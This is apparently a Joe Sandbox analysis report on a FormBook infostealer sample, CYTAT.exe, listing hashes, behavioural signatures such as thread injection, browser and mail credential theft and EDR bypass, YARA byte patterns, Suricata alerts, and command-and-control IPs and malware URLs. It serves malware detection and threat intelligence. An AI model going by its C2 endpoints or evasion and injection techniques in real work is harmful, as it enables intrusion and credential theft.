Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CYTAT.exe

Overview

General Information

Sample name:CYTAT.exe
Analysis ID:1518075
MD5:a1eecc39c791b5a57c0e914b116a1672
SHA1:c5deba202f4187bcde6d16af9fb74badafe1abe3
SHA256:502812cc0e25d2c5e3053cb724b38407b6ba9e2ef6c0631d89879602365fd2a8
Tags:exeuser-adam_zbadam
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • CYTAT.exe (PID: 6380 cmdline: "C:\Users\user\Desktop\CYTAT.exe" MD5: A1EECC39C791B5A57C0E914B116A1672)
    • svchost.exe (PID: 4204 cmdline: "C:\Users\user\Desktop\CYTAT.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • eMNaOgRkIZi.exe (PID: 2432 cmdline: "C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 7472 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • eMNaOgRkIZi.exe (PID: 4052 cmdline: "C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7800 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1d1cfe:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1b9f2d:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          4.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            4.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2df63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16192:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\CYTAT.exe", CommandLine: "C:\Users\user\Desktop\CYTAT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CYTAT.exe", ParentImage: C:\Users\user\Desktop\CYTAT.exe, ParentProcessId: 6380, ParentProcessName: CYTAT.exe, ProcessCommandLine: "C:\Users\user\Desktop\CYTAT.exe", ProcessId: 4204, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\CYTAT.exe", CommandLine: "C:\Users\user\Desktop\CYTAT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CYTAT.exe", ParentImage: C:\Users\user\Desktop\CYTAT.exe, ParentProcessId: 6380, ParentProcessName: CYTAT.exe, ProcessCommandLine: "C:\Users\user\Desktop\CYTAT.exe", ProcessId: 4204, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T11:36:55.380755+020020507451Malware Command and Control Activity Detected192.168.2.752103148.72.152.17480TCP
            2024-09-25T11:37:24.230696+020020507451Malware Command and Control Activity Detected192.168.2.7521073.33.130.19080TCP
            2024-09-25T11:37:37.743830+020020507451Malware Command and Control Activity Detected192.168.2.752111172.191.244.6280TCP
            2024-09-25T11:37:51.714838+020020507451Malware Command and Control Activity Detected192.168.2.752115172.96.191.3980TCP
            2024-09-25T11:38:05.211275+020020507451Malware Command and Control Activity Detected192.168.2.752119217.70.184.5080TCP
            2024-09-25T11:38:19.232099+020020507451Malware Command and Control Activity Detected192.168.2.75212363.250.47.4080TCP
            2024-09-25T11:38:32.552612+020020507451Malware Command and Control Activity Detected192.168.2.75212791.184.0.20080TCP
            2024-09-25T11:38:46.060671+020020507451Malware Command and Control Activity Detected192.168.2.75213113.248.169.4880TCP
            2024-09-25T11:39:13.754391+020020507451Malware Command and Control Activity Detected192.168.2.75213943.242.202.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T11:36:55.380755+020028554651A Network Trojan was detected192.168.2.752103148.72.152.17480TCP
            2024-09-25T11:37:24.230696+020028554651A Network Trojan was detected192.168.2.7521073.33.130.19080TCP
            2024-09-25T11:37:37.743830+020028554651A Network Trojan was detected192.168.2.752111172.191.244.6280TCP
            2024-09-25T11:37:51.714838+020028554651A Network Trojan was detected192.168.2.752115172.96.191.3980TCP
            2024-09-25T11:38:05.211275+020028554651A Network Trojan was detected192.168.2.752119217.70.184.5080TCP
            2024-09-25T11:38:19.232099+020028554651A Network Trojan was detected192.168.2.75212363.250.47.4080TCP
            2024-09-25T11:38:32.552612+020028554651A Network Trojan was detected192.168.2.75212791.184.0.20080TCP
            2024-09-25T11:38:46.060671+020028554651A Network Trojan was detected192.168.2.75213113.248.169.4880TCP
            2024-09-25T11:39:13.754391+020028554651A Network Trojan was detected192.168.2.75213943.242.202.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T11:37:16.578015+020028554641A Network Trojan was detected192.168.2.7521043.33.130.19080TCP
            2024-09-25T11:37:19.136334+020028554641A Network Trojan was detected192.168.2.7521053.33.130.19080TCP
            2024-09-25T11:37:21.688958+020028554641A Network Trojan was detected192.168.2.7521063.33.130.19080TCP
            2024-09-25T11:37:30.189995+020028554641A Network Trojan was detected192.168.2.752108172.191.244.6280TCP
            2024-09-25T11:37:32.652322+020028554641A Network Trojan was detected192.168.2.752109172.191.244.6280TCP
            2024-09-25T11:37:35.207083+020028554641A Network Trojan was detected192.168.2.752110172.191.244.6280TCP
            2024-09-25T11:37:44.123012+020028554641A Network Trojan was detected192.168.2.752112172.96.191.3980TCP
            2024-09-25T11:37:46.664263+020028554641A Network Trojan was detected192.168.2.752113172.96.191.3980TCP
            2024-09-25T11:37:49.179941+020028554641A Network Trojan was detected192.168.2.752114172.96.191.3980TCP
            2024-09-25T11:37:57.561999+020028554641A Network Trojan was detected192.168.2.752116217.70.184.5080TCP
            2024-09-25T11:38:00.099887+020028554641A Network Trojan was detected192.168.2.752117217.70.184.5080TCP
            2024-09-25T11:38:02.652253+020028554641A Network Trojan was detected192.168.2.752118217.70.184.5080TCP
            2024-09-25T11:38:11.586095+020028554641A Network Trojan was detected192.168.2.75212063.250.47.4080TCP
            2024-09-25T11:38:14.149666+020028554641A Network Trojan was detected192.168.2.75212163.250.47.4080TCP
            2024-09-25T11:38:16.688710+020028554641A Network Trojan was detected192.168.2.75212263.250.47.4080TCP
            2024-09-25T11:38:24.904088+020028554641A Network Trojan was detected192.168.2.75212491.184.0.20080TCP
            2024-09-25T11:38:27.458436+020028554641A Network Trojan was detected192.168.2.75212591.184.0.20080TCP
            2024-09-25T11:38:30.000561+020028554641A Network Trojan was detected192.168.2.75212691.184.0.20080TCP
            2024-09-25T11:38:38.365794+020028554641A Network Trojan was detected192.168.2.75212813.248.169.4880TCP
            2024-09-25T11:38:40.949790+020028554641A Network Trojan was detected192.168.2.75212913.248.169.4880TCP
            2024-09-25T11:38:43.527376+020028554641A Network Trojan was detected192.168.2.75213013.248.169.4880TCP
            2024-09-25T11:39:06.101770+020028554641A Network Trojan was detected192.168.2.75213643.242.202.16980TCP
            2024-09-25T11:39:08.656855+020028554641A Network Trojan was detected192.168.2.75213743.242.202.16980TCP
            2024-09-25T11:39:11.202053+020028554641A Network Trojan was detected192.168.2.75213843.242.202.16980TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: CYTAT.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.tekilla.wtf/fpzw/?QF4tL=lBP8AZrpnb&7lpPGx=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIUAvira URL Cloud: Label: malware
            Source: https://www.elsupertodo.net/2jit/?QF4tL=lBP8AZrpnb&7lpPGx=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukAvira URL Cloud: Label: malware
            Source: http://www.tekilla.wtf/fpzw/Avira URL Cloud: Label: malware
            Source: http://www.omexai.info/7xi5/Avira URL Cloud: Label: malware
            Source: http://www.omexai.info/7xi5/?7lpPGx=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&QF4tL=lBP8AZrpnbAvira URL Cloud: Label: malware
            Source: http://www.bola88site.one/3qit/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: CYTAT.exeReversingLabs: Detection: 26%
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: CYTAT.exeJoe Sandbox ML: detected
            Source: CYTAT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eMNaOgRkIZi.exe, 0000000A.00000002.3104267331.00000000009FE000.00000002.00000001.01000000.00000005.sdmp, eMNaOgRkIZi.exe, 0000000D.00000000.1543340144.00000000009FE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: CYTAT.exe, 00000000.00000003.1270333270.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, CYTAT.exe, 00000000.00000003.1269128308.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1379552936.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1377556936.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1473681751.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1478081756.000000000302B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.000000000337E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.00000000031E0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CYTAT.exe, 00000000.00000003.1270333270.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, CYTAT.exe, 00000000.00000003.1269128308.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1379552936.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1377556936.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000C.00000003.1473681751.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1478081756.000000000302B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.000000000337E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.00000000031E0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000004.00000002.1472771099.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1441411393.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000003.1418262002.00000000008FB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.000000000380C000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000000.1543628726.000000000292C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1913472378.00000000255EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.000000000380C000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000000.1543628726.000000000292C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1913472378.00000000255EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000004.00000002.1472771099.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1441411393.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000003.1418262002.00000000008FB000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A1C2C0 FindFirstFileW,FindNextFileW,FindClose,12_2_00A1C2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax12_2_00A09B90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi12_2_00A22399
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h12_2_030D04DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52127 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52127 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52113 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52108 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52122 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52126 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52104 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52117 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52110 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52130 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52125 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52106 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52109 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52114 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52116 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52105 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52120 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52139 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52121 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52139 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52123 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52112 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52119 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52119 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52138 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52118 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52103 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52107 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52103 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52123 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52124 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52107 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52129 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52115 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52115 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52137 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52128 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52111 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52111 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52136 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52131 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52131 -> 13.248.169.48:80
            Source: Joe Sandbox ViewIP Address: 172.191.244.62 172.191.244.62
            Source: Joe Sandbox ViewIP Address: 63.250.47.40 63.250.47.40
            Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: HOSTNETNL HOSTNETNL
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
